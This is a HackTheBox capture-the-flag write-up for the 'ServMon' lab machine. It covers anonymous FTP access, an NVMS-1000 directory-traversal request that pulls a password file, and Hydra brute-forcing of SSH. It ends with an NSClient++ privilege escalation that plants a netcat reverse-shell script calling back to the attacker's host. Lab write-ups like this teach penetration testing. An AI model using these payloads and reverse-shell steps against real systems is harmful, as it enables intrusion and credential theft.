HackTheBox - ServMon 👾💻

HackTheBoxPenTesting
, , , , ,

HackTheBox-ServMon

Quick Summary

→ Very nice box which is fit for beginners’ a machine that vulnerable to directory traversal which the attacker can enumerate several files and gain access to this machine. I will say the privilege escalation part is quiet hard if you take the web server of NSClient++ because it’s takes time to load due high network traffic, but I can easily get the root using cURL to send request. Using cURL i send nc.exe and execute it. Finally got the root.

Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and what services are running

  2. Enumeration

    → Service enumeration

    ftp is available so I digging it

    → got the confidential.txt

  3. Post - Exploitation

    → Login to web page with credentials we got.

    NVMS-1000 was vulnerable to directory-traversal

    → enumerate machine with directory-traversal vulnerabilty

    → Found the password.txt file on a desktop

  4. Exploitation

    → collect the all the password

    → use it bruteforce user using Hydra

    → finally I got the right password and login it into ssh and get user.txt

  5. Privilege Escalation

    → start enumerating directories

    → found the NSClient++ folder

    → after searching it on google there was vulnerability in NSClient++ where the low privilege can ability to read the web administator’s password in cleartext from the configuration file.

    → due to high load of network traffic in the web page’ it is so slow to load so I try cURL to get root

    → try to put nc.exe using SMB Server

    → load the binary and execute

    → Finally we get the root

Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use

  • -sV ⇒ Probe open ports to determine service/version info
  • -sC ⇒ equivalent to —script=default
  • -A- ⇒ Agressive scan
  • -oN ⇒ to save our scan results to a text file
# bash

nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon

# bash

root in htb/boxes/ServMon 
❯ nmap -sV -sC -A 10.10.10.184 -oN nmap-ServMon
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-14 08:08 PST
Nmap scan report for 10.10.10.184
Host is up (0.25s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  nrpe?
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/14%Time=5E94FF5F%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption
SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4
SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt
SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf<
SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit
SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\
SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h
SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t
SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc
SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\
SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65
SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/14%OT=21%CT=1%CU=44262%PV=Y%DS=2%DC=T%G=Y%TM=5E95004
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(SP=F
OS:C%GCD=1%ISR=FC%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%
OS:O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3
OS:=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N
OS:%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%
OS:F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-14T00:16:09
|_  start_date: N/A

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   257.80 ms 10.10.14.1
2   257.93 ms 10.10.10.184

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.59 seconds

root in htb/boxes/ServMon took 5m17s


Nmap Results

So there’s a lot of ports open but let’s check which most interesting. Checking that 1 by 1 takes a lot of time

Enumeration

Checking the FTP Service

Since there was an ftp let’s check it if we can access it anonymously :

# bash

root in htb/boxes/ServMon 
❯ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp>

Inside the ftp file we got two users – Nadine & Nathan let’s check first Nadine’s directory and transfer it to my Kali machine.

# bash

ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 6.29 secs (0.0270 kB/s)
ftp>

so inside of nadine directory there a confidential.txt file’ next, check Nathan directory :

# bash

ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
186 bytes received in 0.25 secs (0.7285 kB/s)
ftp>

There is Notes to do.txt so it is task for our user.

Next’ read the .txt file of two users

# bash

root in htb/boxes/ServMon 
❯ ls
 Confidential.txt   nmap-ServMon  'Notes to do.txt'

root in htb/boxes/ServMon 
❯ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
root in htb/boxes/ServMon


so I get a hint from nadine txt file. It seems that the admin put her password in her desktop.

Next the task of nathan :

# bash

root in htb/boxes/ServMon 
❯ cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
root in htb/boxes/ServMon



So another hint I got. the 1 & 2 task are completed but the remaining 3 are not.

Let’s start digging more :

Post Exploitation

Checking the Web client

I visit on the web page of the box. In nathan notes they mentioned the NVMS, and this seems has version – NVMS - 1000.
I search it on google and it is vulnerable to directory - traversal :

HackTheBox-ServMon

The step by step on Exploit DB

Offensive Security’s Exploit Database Archive
NVMS 1000 - Directory Traversal.. webapps exploit for Hardwa…

The NVMS login page :

HackTheBox-ServMon

Directory Traversal

In this phase i will try nvms-1000 exploit’ with Burp Suite :

HackTheBox-ServMon

Directory traversal confirmed ! Now’ let’s try to look at nadine desktop it’s mentioned on here note that her password is there :

# bash

GET /../../../../../../../../../../../../Users/Nadine/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

but I got 404 status :

# bash

HTTP/1.1 404 Not Found
Content-type: text/html
Content-Length: 0
Connection: close
AuthInfo:

I think password of nadine doesn’t exist so I tried user nathan if i can get any :

# bash

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

after I send that request I got a list of passwords :

# bash

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$


Exploitation

Brute forcing the SSH

I saved all the passwords in a txt file then I create another txt file which contains 2 users – nadine & nathan

I use hydra to brute force the SSH service and finally I got the right credentials .

# bash

root in htb/boxes/ServMon took 1m15s 
❯ hydra -L users -P passwords 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-14 08:45:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-14 08:45:58

root in htb/boxes/ServMon took 24s


Get user.txt

after I found the right creds. I finally get in to the machine and grab the user.txt

# bash

root in htb/boxes/ServMon 
❯ ssh nadine@10.10.10.184
nadine@10.10.10.184's password: 


Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.


nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine

08/04/2020  23:16    <DIR>          .
08/04/2020  23:16    <DIR>          ..
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  27,382,452,224 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
14/04/2020  01:20                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,382,452,224 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt
[-----]bb8f5da6[-------------------]

nadine@SERVMON C:\Users\Nadine\Desktop>


Privilege Escalation

Enumerating directories

at first I started to enumerate the machine directories and I found inside on ‘Program Files’ directories what’s mentioned in nathan's note which is the NSClient++

# bash

nadine@SERVMON C:\Users\Nadine\Desktop>cd /

nadine@SERVMON C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\

08/04/2020  23:21    <DIR>          inetpub
19/03/2019  05:52    <DIR>          PerfLogs
08/04/2020  23:21    <DIR>          Program Files
08/04/2020  23:21    <DIR>          Program Files (x86)
18/01/2020  11:00    <DIR>          RecData
18/01/2020  12:31    <DIR>          Shared
14/04/2020  01:38    <DIR>          Temp
08/04/2020  22:26    <DIR>          Users
09/04/2020  09:38    <DIR>          Windows
               0 File(s)              0 bytes
               9 Dir(s)  27,379,249,152 bytes free

nadine@SERVMON C:\>cd 'Program Files'
The system cannot find the path specified.

nadine@SERVMON C:\>cd "Program Files"

nadine@SERVMON C:\Program Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:21    <DIR>          Common Files
08/04/2020  23:18    <DIR>          Internet Explorer
19/03/2019  05:52    <DIR>          ModifiableWindowsApps
16/01/2020  19:11    <DIR>          NSClient++ // <-- our target
08/04/2020  23:09    <DIR>          Reference Assemblies
08/04/2020  23:21    <DIR>          UNP
14/01/2020  09:14    <DIR>          VMware
08/04/2020  22:31    <DIR>          Windows Defender
08/04/2020  22:45    <DIR>          Windows Defender Advanced Threat Protection
19/03/2019  05:52    <DIR>          Windows Mail
19/03/2019  12:43    <DIR>          Windows Multimedia Platform
19/03/2019  06:02    <DIR>          Windows NT
19/03/2019  12:43    <DIR>          Windows Photo Viewer
19/03/2019  12:43    <DIR>          Windows Portable Devices
19/03/2019  05:52    <DIR>          Windows Security
19/03/2019  05:52    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  27,379,228,672 bytes free

nadine@SERVMON C:\Program Files>

I search this on google and I found this step by step privilege escalation.

Base on the exploit, When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator’s password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

Grab administrator password

I open the NSClient++ directories and try to display the admin password :

# bash

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd \"Program Files"

nadine@SERVMON C:\Program Files>cd NSClient++

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT // <-- admin password

nadine@SERVMON C:\Program Files\NSClient++>

Got it ! Now let’s check on what port is running NSClient++ Web Server

# bash

nadine@SERVMON C:\Program Files>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2472
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2696
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       3924
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       1832
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       1832
  TCP    0.0.0.0:6063           0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:6699           0.0.0.0:0              LISTENING       8064
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7344
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       1832

The NSClient++ is running on port 8443 it is also appear on my nmap scan on recon phase.

# bash

8443/tcp open  tcpwrapped
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time

To work on this I need to use port forwarding and visit the NSClient web page.

# bash

root in htb/boxes/ServMon 
❯ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.


nadine@SERVMON C:\Users\Nadine>

NSClient++ Web Server

I found some difficulty to access the web server it is so slow to respond and load due to high network traffic but I can use cURL to send a request.

Steps to get reverse shell :

I will try to transfer my nc.exe using SMB Server and try to put nc.exe inside so :

# bash

root in htb/boxes/ServMon 
❯ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/payas0.bat --data-binary "C:\Temp\nc.exe 10.10.15.151 9001 -e cmd.exe"
Enter host password for user 'admin':

Added payas0 as scripts\payas0.bat

root in htb/boxes/ServMon took 12s


I got the message that my script is added. Next i will setup my netcat and execute the binary using this request .

# bash

root in htb/boxes/ServMon 
❯ curl -s -k -u admin https://localhost:8443/api/v1/queries/payas0/commands/execute?time=1m
Enter host password for user 'admin':


after 1 minute I successfully got admin shell :

# bash
root in htb/boxes/ServMon 
❯ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.15.151] from (UNKNOWN) [10.10.10.184] 52839
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\NSClient++>

Finally I’ve got the root

# bash

PS C:\Program Files\NSClient++> whoami
whoami
nt authority\system
PS C:\Program Files\NSClient++>

Grab root flag

After getting the admin I can grab now the root.txt

# bash

PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
64e1-------------------------f274
PS C:\users\Administrator\Desktop>

If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

NVMS-1000 Exploit

NSClient++ - Privilege Escalation